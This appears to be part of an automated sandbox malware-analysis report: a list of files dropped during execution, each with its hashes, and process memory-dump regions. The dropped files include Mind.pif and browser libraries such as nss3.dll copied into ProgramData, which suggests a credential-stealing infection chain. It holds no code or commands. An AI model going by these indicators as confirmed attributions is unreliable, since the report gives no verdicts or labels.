MD5 cc32e2964f235bf9bddd71d4f7d3a9e2
SHA1 a570733cfce8d135315e86473b0ac6f6b4a4e763
SHA256 ec7c44500d11213688b83a04fb95c52b0d2c3ed2cc28d8d7e604f5b9336852f4
SHA512 3c3bea9699b4904e949c71ea40e72f39824837a9ed5251d1e1b5b857642bb2d6816c5d125255bb9272f599dd14d594fa820dacf22e8f72df424a419942e9ff8b

C:\Users\Admin\AppData\Local\Temp\Venezuela

MD5 47d9d9cdad725675c2dfa55ed4717db6
SHA1 d7bc49f9fae903accddf2da620dc5b9668f35dce
SHA256 d4be1b5210a95583cc8617ab58b5947b46abaf4f000960abcc774eee20751210
SHA512 4e12b065fc581460d137a0aebdffd3d56cfaf82b4d8be81bdfc3d4daf0897eda2230ab05166b35928b0b3c2f2cf0fb751ace6109b400d107a89797fefb5cf34e

C:\Users\Admin\AppData\Local\Temp\Ensures

MD5 5abe66470ddba2d1adc1ea359fb58b7d
SHA1 b914707d1f1b1c16dc03470cd8737a889292796c
SHA256 fecefcaab4d2499057061a01c13c3ec834ec4fcf13188e8708ad33cc3a6c6cb8
SHA512 5f95116f3f91ce9ed5d084e2c7b9df62892a633b3f45c3b714be8c34d39258d401e189297e49e15e8f497b88c2677f089473cd60e2e4806647fb7fc83471c0e2

C:\Users\Admin\AppData\Local\Temp\Banners

MD5 3f96912bd26122377de90bdf2b2adb43
SHA1 355135ae39c67bc1e8a34962db066b2d4862df22
SHA256 1025adb658535b34a6b1b162708f1d829e332bf7dfda6e389c5b676d2057b881
SHA512 6942ce7a6a09eaa4e4f897935d472d8a50cdc822d820e978eba449207ae42b65c86f5374226e4c1957ef9f8a7b3c26dfcdf45ec69edae9ce51173a0822c08174

C:\Users\Admin\AppData\Local\Temp\Voice

MD5 c01790f3cef20061f828578069162760
SHA1 72a450b13fd37f6c5c95d94240c51354316d5962
SHA256 328d81768d3cb94a93c1d689ed4b571753d59309f44954e83ee9d3966369325b
SHA512 4350a43ddef179c199ea55acba477b57490f2434eb45cea9b3f9ebca9f4b3615c41bc38f19570bd2a1188fecc472c5406ef2d1637b16a55deb5814ab2b785fab

C:\Users\Admin\AppData\Local\Temp\Tactics

MD5 2c9654e874efe5146131ed5422a715d9
SHA1 0e6d5c61f2b4821da4ecedd2a59eb6b023daa0e3
SHA256 2b35604cd27e82644be51f3266054f35b2415dd65abaa7b9b34f329fa14038e6
SHA512 bfba8ba24bc24899718d2d0b1f8948c1899c41b00624493bbd9a7c253cdee44a0f6e28d5db33473dafc3dbe6367fbdca2c062ea9cf21a15ef7ea53de8ce71c05

C:\Users\Admin\AppData\Local\Temp\Expects

MD5 f9c59716c76e0d9aea1ed33432d0c0eb
SHA1 e017af5635025c7a5dddd5879e19f0e56cee5f63
SHA256 26deadb528299fc9567030e170fd608190da63a2cc0b8869565e4706329aee9b
SHA512 c24d790ae2ce1a66a5c9fd7eb15317cc25a2e16d28996eab7b46bea52b842ae20fcfc934edad5b70d8a0b66350db587057f346ca534e4b97fbb805693c6def61

C:\Users\Admin\AppData\Local\Temp\Controversial

MD5 b8d54a8f7a866ce5950c2c67b18343ee
SHA1 95f12fbd6244ea3ecee9795ebd984a97bd056ef7
SHA256 8205f767c8dd7bb85316fe3f1988225c4bab822b39c03c412473f63f7fadddae
SHA512 1679d376069aab604f9c483623f1f7d53ca3792fa6dddb214360690186ec39662807149a7e525d797ee89d80bf742fb51a59beb0e053c4187b661bd8c954a164

C:\Users\Admin\AppData\Local\Temp\Noticed

MD5 90ab924a6bc6d90d922308452ce5c128
SHA1 4fd74c170817b9685b9230625fe7e47d54473829
SHA256 2ebfcd2eeaf8bc9561a1310ddc51e8759859e6523d0e8c73bb06969368ef88b2
SHA512 e93e506184d2b57abeb9601968bb0f53a06f78e8d08d3a5b5fd9f8b56a1e8709b2a48d3372e0a5d5152902a294c3b201176b35f60f7d4ee2636e15e0ca99b740

C:\Users\Admin\AppData\Local\Temp\Exception

MD5 2b79f9677d8663ccff67fbe4677a5065
SHA1 f63cbee04c6ae82b0f9ebaeeed8fbce7be51e7ed
SHA256 7b70774cca90f24dc9e1b889b6e277961ed7b61ed4cd8dbdd4642c65cb9b1ba9
SHA512 ce31599996e45e5aeb04b7d51e510711303471e85520986c91c4eac61a843c3d8e2b70851a1a6df0bf4b0825d417ac0b1b70822e93ab8f9523414effbef93619

C:\Users\Admin\AppData\Local\Temp\Abroad

MD5 6d4062e0f673dbe0a06ec227fe515c62
SHA1 c35c0ed445442d405ccfc78a20bbb86cf97526f6
SHA256 4e1c30452e317b04199626e8b7ca7f3b2c0c6b275715b1832533fcec030b72f4
SHA512 df953dbdb117c7ef3dbfcd266dee839f9a1ca4d50924f86d9620d0ca7a7fc9e3059caa955251e2327d46571ceb0b79dc53a2fef5b4b4f829ba33c436f982a921

C:\Users\Admin\AppData\Local\Temp\150746\Mind.pif

MD5 b06e67f9767e5023892d9698703ad098
SHA1 acc07666f4c1d4461d3e1c263cf6a194a8dd1544
SHA256 8498900e57a490404e7ec4d8159bee29aed5852ae88bd484141780eaadb727bb
SHA512 7972c78acebdd86c57d879c12cb407120155a24a52fda23ddb7d9e181dd59dac1eb74f327817adbc364d37c8dc704f8236f3539b4d3ee5a022814924a1616943

memory/3716-210-0x0000000001600000-0x0000000001D4A000-memory.dmp

memory/3716-211-0x0000000001600000-0x0000000001D4A000-memory.dmp

memory/3716-213-0x0000000001600000-0x0000000001D4A000-memory.dmp

memory/3716-220-0x0000000001600000-0x0000000001D4A000-memory.dmp

memory/3716-222-0x0000000061E00000-0x0000000061EF3000-memory.dmp

memory/3716-221-0x0000000001600000-0x0000000001D4A000-memory.dmp

memory/3716-235-0x0000000001600000-0x0000000001D4A000-memory.dmp

memory/3716-236-0x0000000001600000-0x0000000001D4A000-memory.dmp

memory/3716-244-0x0000000001600000-0x0000000001D4A000-memory.dmp

memory/3716-245-0x0000000001600000-0x0000000001D4A000-memory.dmp

memory/3716-261-0x0000000001600000-0x0000000001D4A000-memory.dmp

C:\ProgramData\AKKEGDGCGDAK\nss3.dll

MD5 1cc453cdf74f31e4d913ff9c10acdde2
SHA1 6e85eae544d6e965f15fa5c39700fa7202f3aafe
SHA256 ac5c92fe6c51cfa742e475215b83b3e11a4379820043263bf50d4068686c6fa5
SHA512 dd9ff4e06b00dc831439bab11c10e9b2ae864ea6e780d3835ea7468818f35439f352ef137da111efcdf2bb6465f6ca486719451bf6cf32c6a4420a56b1d64571

C:\ProgramData\AKKEGDGCGDAK\mozglue.dll

MD5 c8fd9be83bc728cc04beffafc2907fe9
SHA1 95ab9f701e0024cedfbd312bcfe4e726744c4f2e
SHA256 ba06a6ee0b15f5be5c4e67782eec8b521e36c107a329093ec400fe0404eb196a
SHA512 fbb446f4a27ef510e616caad52945d6c9cc1fd063812c41947e579ec2b54df57c6dc46237ded80fca5847f38cbe1747a6c66a13e2c8c19c664a72be35eb8b040

memory/3716-262-0x0000000001600000-0x0000000001D4A000-memory.dmp

memory/3716-284-0x0000000001600000-0x0000000001D4A000-memory.dmp

memory/3716-285-0x0000000001600000-0x0000000001D4A000-memory.dmp

C:\ProgramData\AAKJEGCFBG.exe

MD5 6cfddd5ce9ca4bb209bd5d8c2cd80025
SHA1 424da82e9edbb6b39a979ab97d84239a1d67c48b
SHA256 376e1802b979514ba0e9c73933a8c6a09dd3f1d2a289f420c2202e64503d08a7
SHA512 d861130d87bfedc38a97019cba17724067f397e6ffe7e1384175db48c0a177a2e7e256c3c933d0f42766e8077f767d6d4dc8758200852e8ec135736daee7c0f8

memory/1396-308-0x00000000003B0000-0x00000000008C3000-memory.dmp

C:\ProgramData\HDGCGHIJKE.exe

MD5 daaff76b0baf0a1f9cec253560c5db20
SHA1 0311cf0eeb4beddd2c69c6e97462595313a41e78
SHA256 5706c6f5421a6a34fdcb67e9c9e71283c8fc1c33499904519cbdc6a21e6b071c
SHA512 987ca2d67903c65ee1075c4a5250c85840aea26647b1d95a3e73a26dcad053bd4c31df4ca01d6cc0c196fa7e8e84ab63ed4a537f72fc0b1ee4ba09cdb549ddf3

memory/1868-319-0x00000000007F0000-0x0000000000A38000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\e947e584

MD5 8d443e7cb87cacf0f589ce55599e008f
SHA1 c7ff0475a3978271e0a8417ac4a826089c083772
SHA256 e2aaaa1a0431aab1616e2b612e9b68448107e6ce71333f9c0ec1763023b72b2a
SHA512 c7d0ced6eb9e203d481d1dbdd5965278620c10cdc81c02da9c4f7f99f3f8c61dfe975cf48d4b93ccde9857edb881a77ebe9cd13ae7ef029285d770d767aa74a5

memory/1396-329-0x0000000072500000-0x000000007267B000-memory.dmp

memory/1868-331-0x0000000072500000-0x000000007267B000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\e8dfc257

MD5 c62f812e250409fbd3c78141984270f2
SHA1 9c7c70bb78aa0de4ccf0c2b5d87b37c8a40bd806
SHA256 d8617477c800cc10f9b52e90b885117a27266831fb5033647b6b6bd6025380a8
SHA512 7573ecac1725f395bbb1661f743d8ee6b029f357d3ef07d0d96ee4ff3548fe06fab105ee72be3e3964d2053de2f44245cca9a061d47c1411949840c84f6e9092

memory/1396-332-0x00007FF9BBDD0000-0x00007FF9BBFC5000-memory.dmp

memory/1868-333-0x00007FF9BBDD0000-0x00007FF9BBFC5000-memory.dmp

memory/3716-337-0x0000000001600000-0x0000000001D4A000-memory.dmp

memory/3716-338-0x0000000001600000-0x0000000001D4A000-memory.dmp

memory/1396-339-0x0000000072500000-0x000000007267B000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\eba9d8c6

MD5 33a29ea7f445325752302ad6f2536597
SHA1 0df4451ecf64b0f8a405e25b142f7d77dae4685c
SHA256 903f891cba2b2e1e29050d81766dfea09215f369aa15e119bb6daef2d6998bc2
SHA512 385ec48298d060b4df53c758634c3df33fb4bb5ad06d1a023e366c78ed15c4be3c7c852a9fa87d217a316c0f2ae908975b5caea86429ca2526cba74fc35656be

memory/1868-342-0x0000000072500000-0x000000007267B000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\ee4d5e96

MD5 aeb8de794b72ad270cc99de55c0e31a6
SHA1 7bb5ecb74ee6a88cad8022edf72892376306838f
SHA256 132268027278bc9d9e9aef2e88990854aa7427fe61499243013da47703476553
SHA512 501ef8674b173950ebd8670c6553c43ceca31602b75999307ae087940cf5e645a1156c662bb182f0f70382e1b701d50a90bf0e305085020e0f2d7d3a9c118f54

memory/3716-345-0x0000000001600000-0x0000000001D4A000-memory.dmp

memory/3716-346-0x0000000001600000-0x0000000001D4A000-memory.dmp

memory/3568-355-0x00007FF9BBDD0000-0x00007FF9BBFC5000-memory.dmp

memory/2416-356-0x00007FF9BBDD0000-0x00007FF9BBFC5000-memory.dmp

memory/2416-357-0x0000000072500000-0x000000007267B000-memory.dmp

C:\ProgramData\AKKEGDGCGDAK\VCRUNT~1.DLL

MD5 a37ee36b536409056a86f50e67777dd7
SHA1 1cafa159292aa736fc595fc04e16325b27cd6750
SHA256 8934aaeb65b6e6d253dfe72dea5d65856bd871e989d5d3a2a35edfe867bb4825
SHA512 3a7c260646315cf8c01f44b2ec60974017496bd0d80dd055c7e43b707cadba2d63aab5e0efd435670aa77886ed86368390d42c4017fc433c3c4b9d1c47d0f356

C:\ProgramData\AKKEGDGCGDAK\softokn3.dll

MD5 4e52d739c324db8225bd9ab2695f262f
SHA1 71c3da43dc5a0d2a1941e874a6d015a071783889
SHA256 74ebbac956e519e16923abdc5ab8912098a4f64e38ddcb2eae23969f306afe5a
SHA512 2d4168a69082a9192b9248f7331bd806c260478ff817567df54f997d7c3c7d640776131355401e4bdb9744e246c36d658cb24b18de67d8f23f10066e5fe445f6

C:\ProgramData\AKKEGDGCGDAK\msvcp140.dll

MD5 5ff1fca37c466d6723ec67be93b51442
SHA1 34cc4e158092083b13d67d6d2bc9e57b798a303b
SHA256 5136a49a682ac8d7f1ce71b211de8688fce42ed57210af087a8e2dbc8a934062
SHA512 4802ef62630c521d83a1d333969593fb00c9b38f82b4d07f70fbd21f495fea9b3f67676064573d2c71c42bc6f701992989742213501b16087bb6110e337c7546

memory/2416-372-0x0000000072500000-0x000000007267B000-memory.dmp

memory/652-375-0x00007FF99D010000-0x00007FF99E687000-memory.dmp

memory/4864-379-0x00007FF9BBDD0000-0x00007FF9BBFC5000-memory.dmp

memory/652-380-0x0000000000400000-0x000000000040A000-memory.dmp

memory/3724-384-0x0000000140000000-0x00000001407DC000-memory.dmp

memory/3724-388-0x000002965EED0000-0x000002965EEF0000-memory.dmp

memory/3724-386-0x0000000140000000-0x00000001407DC000-memory.dmp

memory/3724-387-0x0000000140000000-0x00000001407DC000-memory.dmp

memory/3724-390-0x0000000140000000-0x00000001407DC000-memory.dmp

memory/3724-391-0x0000000140000000-0x00000001407DC000-memory.dmp

memory/3724-393-0x0000000140000000-0x00000001407DC000-memory.dmp

memory/3724-392-0x0000000140000000-0x00000001407DC000-memory.dmp

memory/3724-389-0x0000000140000000-0x00000001407DC000-memory.dmp

memory/4864-394-0x0000000000D00000-0x0000000000D71000-memory.dmp